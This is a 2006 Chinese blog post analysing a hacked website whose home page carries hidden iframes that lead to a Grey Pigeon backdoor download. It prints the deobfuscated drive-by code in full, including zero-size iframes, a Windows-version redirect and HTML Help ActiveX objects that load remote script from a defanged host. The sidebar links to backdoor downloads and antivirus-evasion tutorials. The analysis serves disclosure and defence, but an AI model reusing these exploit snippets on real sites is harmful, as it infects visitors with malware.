[2006-04-12]发现一个使用技术升级、下载灰鸽子的网站(第3版)

最新推荐文章于 2009-07-08 18:58:00 发布
最新推荐文章于 2009-07-08 18:58:00 发布
阅读量6.1k 收藏
点赞数
分类专栏: 原创作品 系统维护 系统安全 文章标签: javascript command iframe function html object
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Purpleendurer/article/details/654853
版权

endurer 原创

2006-04-12 第3版 补充:瑞星的反应
2006-04-08 第2版 分析young.gif,确认young.css为灰鸽子
2006-04-07 第1

网站首页被插入恶意代码:

 

 

<iframe src='hxxp://www.***hyap98.com/123/wawa.htm' width='0' height='0' frameborder='0'></iframe><iframe src='hxxp://djloveqq.***go3.icpcn.com/cert/joke.htm' width='0' height='0' frameborder='0'></iframe>

 


hxxp://www.***hyap98.com/123/wawa.htm的部分内容经过escape()加密,unescape()后为:

 

 

 

<HTML>
<HEAD>
<SCRIPT LANGUAGE="Javascript">
<!--
var Words="<iframe src="hxxp://www.***hyap98.com/123/music.htm" width='0' height='0' frameborder='0'></iframe>
<iframe src="hxxp://www.***hyap98.com/rx/joke.htm" width='0' height='0' frameborder='0'></iframe>"
function SetNewWords()
{
var NewWords;
NewWords=unescape(Words);
document.write(NewWords);
}
SetNewWords();
// -->
</SCRIPT>
</HEAD>
<BODY>
</BODY>
</HTML>

 

 

hxxp://www.***hyap98.com/123/music.htm的部分内容经过escape()加密,unescape()后为:

 

 

<HTML>
<HEAD>
<SCRIPT LANGUAGE="Javascript">
<!--
var Words="<embed type="audio/x-pn-realaudio-plugin"
src="music.smi"
controls="controlpanel,statusbar" height=95
width=150 autostart=true>"
function SetNewWords()
{
var NewWords;
NewWords=unescape(Words);
document.write(NewWords);
}
SetNewWords();
// -->
</SCRIPT>
</HEAD>
<BODY>
</BODY>
</HTML>

 

 

hxxp://www.***hyap98.com/rx/joke.htm的内容为(已去掉多余的起始空格):

 


<center><font color=red>对不起,您访问的页面不存在!</font><center> <script language=javascript>ie='windows';ver=navigator.appVersion;if(!(ver.indexOf('NT 5.0')==-1))ie='winnt';if(!(ver.indexOf('Windows 98')==-1)){ie='w98';}location.href=ie+'.htm';</script>

 

 

 

此网页检查Windows版本,并打开相应的网页windows.htm、winnt.htm或w98.htm。

这与又一个自动下载病毒的政府网站中遇到的相似。


hxxp://www.***hyap98.com/rx/windows.htm的部分内容经过escape()加密,unescape()并去掉多余的起始空格后为:

 


<HTML>
<HEAD>
<SCRIPT LANGUAGE="Javascript">
<!--
var Words="<SCRIPT language=VScript src="young.gif"></SCRIPT><SCRIPT language=VScript src="young.css"></SCRIPT><HTML><BODY><div style="display:none"><OBJECT id="news526" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;/windows/help/apps.chm');</OBJECT><OBJECT id="news215" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;javascript:eval("document.write(/"<SCRIPT language=JScript src=///"hxxp://www.***hyap98.com/rx/young.gif///"/"+String.fromCharCode(62)+/"</SCR/"+/"IPT/"+String.fromCharCode(62))")'></OBJECT></div><SCRIPT>news526.Click();f1=1+1;f1=f1+2;setTimeout("news215.Click();",0);fu1=2;fu1=3+4;</SCRIPT></BODY></HTML>"
function SetNewWords()
{
var NewWords;
NewWords=unescape(Words);
document.write(NewWords);
}
SetNewWords();
// -->
</SCRIPT>
</HEAD>
<BODY>
</BODY>
</HTML>

 

 

 

hxxp://www.***hyap98.com/rx/winnt.htm的部分内容经过escape()加密,unescape()并去掉多余的起始空格后为:

 


<HTML>
<HEAD>
<SCRIPT LANGUAGE="Javascript">
<!--
var Words="<SCRIPT language=VScript src="young.gif"></SCRIPT><SCRIPT language=VScript src="young.css"></SCRIPT><HTML><BODY><div style="display:none"><OBJECT id="news571" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;/winnt/help/apps.chm');</OBJECT><OBJECT id="news577" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;javascript:eval("document.write(/"<SCRIPT language=JScript src=///"hxxp://www.***hyap98.com/rx/young.gif///"/"+String.fromCharCode(62)+/"</SCR/"+/"IPT/"+String.fromCharCode(62))")'></OBJECT></div><SCRIPT>news571.Click();f1=1+1;f1=f1+2;setTimeout("news577.Click();",0);fu1=2;fu1=3+4;</SCRIPT></BODY></HTML>"

 

function SetNewWords()
{
var NewWords;
NewWords=unescape(Words);
document.write(NewWords);
}
SetNewWords();
// -->
</SCRIPT>
</HEAD>
<BODY>
</BODY>
</HTML>

 

 

hxxp://www.***hyap98.com/rx/w98.htm的大小为0。

hxxp://www.***hyap98.com/rx/young.css其实是个加过壳的PE可执行文件。


hxxp://www.***hyap98.com/rx/young.gif其实是个利用系统漏洞的网页文件,访问注册表获取IE临时文件夹路径,并利用WScript.Shell复制文件young.css,创建文件c:/wins.bat,c:/boot.hta,C:/wins.exe。

windows.htm 瑞星报为:Trojan.DL.JS.Agent.g

winnt.htm 瑞星报为:Trojan.DL.JS.Agent.h

紫郢剑侠
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
安全相关-病毒防治-灰鸽子病毒专杀工具 2017 最新.zip
09-15
网络-计算机-安全相关
灰鸽子官方下载地址
weixin_33949359的博客
09-18 822
灰鸽子官方下载地址06灰鸽子官方下载地址: [url]http://www.huigezi.net/down/Vip2006setup.exe[/url] 07 测试 [url]http://www.huigezi.net/down/VIP2007Beta1.exe[/url] ...
***防线***必备工具包(vip专用的)
weixin_33720956的博客
09-18 359
***防线***必备工具包(vip专用的) 下载地址:[url]http://vipsoft1.hacker.com.cn/vip1-down/gongju/ruqinbao.rar[/url] NO.1***抓肉鸡————1.[啊D网络工具包]DTools[免杀]一款经过免杀处理的啊D网络工具包。2.ssport1.高速扫描:扫描的速度只跟你的CPU的速度有关。现在...
灰鸽子新手完全教程(简单上线,简单映射,简单免杀)
zy_rain2006的专栏
12-14 5370
首先我们打开我们的鸽子控制端,前面还得关了自己的防火墙哦~我的如下图中~顶上抹去的是我的所有IP,合乎~=780) window.open(http://img395.imageshack.us/img395/6807/13vd1.png);" height="534" alt="" hspace="" src="http://news.77169.com/UploadFiles/200607
黑客教程之灰鸽子VIP2006终极免杀技术(转)
08-15 153
黑客教程之灰鸽子VIP2006终极免杀技术(转)[@more@]  这次给大家做一个过各种杀毒软件的免杀教程。这次教程主要以灰鸽子VIP2006服务端为例!现在网上很多免杀教程,我也看过很多,但是免杀效果都不是很好,用不几天就被...
泛微协同办公平台e-cology9.0本前端使用手册
02-11
泛微协同办公平台e-cology9.0本前端使用手册 泛微协同办公平台e-cology9.0本前端使用手册
Console-game:一个小型控制台冒险游戏 游戏Wiki
08-04
Console GameBy NriotHrreion游戏介绍这是一款web控制台冒险游戏, 游戏主角是小比特, 如果你想了解更多就去玩玩看呗?游戏中可以通过刷怪来升级和赚钱, 有了钱就可以在商店购买更强的武器, 游戏会在特定的等级解锁新...
DC-DC电源输出模块,12V转5V输出
05-26
DC-DC电源转换原理图和PCB,12V转5V输出,电路板传感器专用!
黑防专.rar
10-13
网络扫描器 快速扫描
黑防远程控制
05-26
黑防的第一代远程控制软件
postcards-from-pigeons:鸽子的消息
07-14
卡布卡普 从 Cordova (PhoneGap) 开始的示例应用程序
灰鸽子远程管理Version2.0.3和灰鸽子远程管理2006 break law
studyvcmfc的专栏
07-08 690
灰鸽子远程管理Version2.0.3和灰鸽子远程管理2006 break law
某论坛被加入下载灰鸽子Backdoor.Gpigeon.2006.bbe等恶意程序的代码
Purpleendurer@CSDN
01-31 1693
endurer 原创2007-01-31 第1论坛首页包含代码:/----<script src="hxxp://www.4**884**6*6.com.**/AdOpen***.asp?Adid=41&MyUserID=dy16"></script>----/AdOpen***.asp 中包含代码:/----<IFRAME frameBorder=0 height=0 scrollin
[07-19] 解决灰鸽子新变种、Rootkit.Vanti.gen等及www.58111.com劫持(第5)
Purpleendurer@CSDN
07-12 7241
endurer 原创2006-07-19 第5 补充杀毒软件的反应。2006-07-17 第4 补充杀毒软件的反应。2006-07-14 第3 补充杀毒软件的反应。2006-07-13 第2 补充杀毒软件的反应,在该网友电脑的其它盘发现的恶意程序。2006-07-12 第1  昨天有网友说他的电脑中的瑞星每次开机自动扫描总是报告发现灰鸽子,实时监控总发现并成功删除Rootkit.
一个笼子15个头,30只脚,一共多少只鸽子和鸡
最新发布
03-14
根据题目描述,我们可以列出以下方程式: ...x + y = 15 (x 为鸽子的数量,y 为鸡的数量) 2x + 4y = 30 (鸽子有两只脚,鸡有四只脚) 解方程得到 x = 5,y = 10,因此笼子里有 5 只鸽子和 10 只鸡。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

紫郢剑侠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值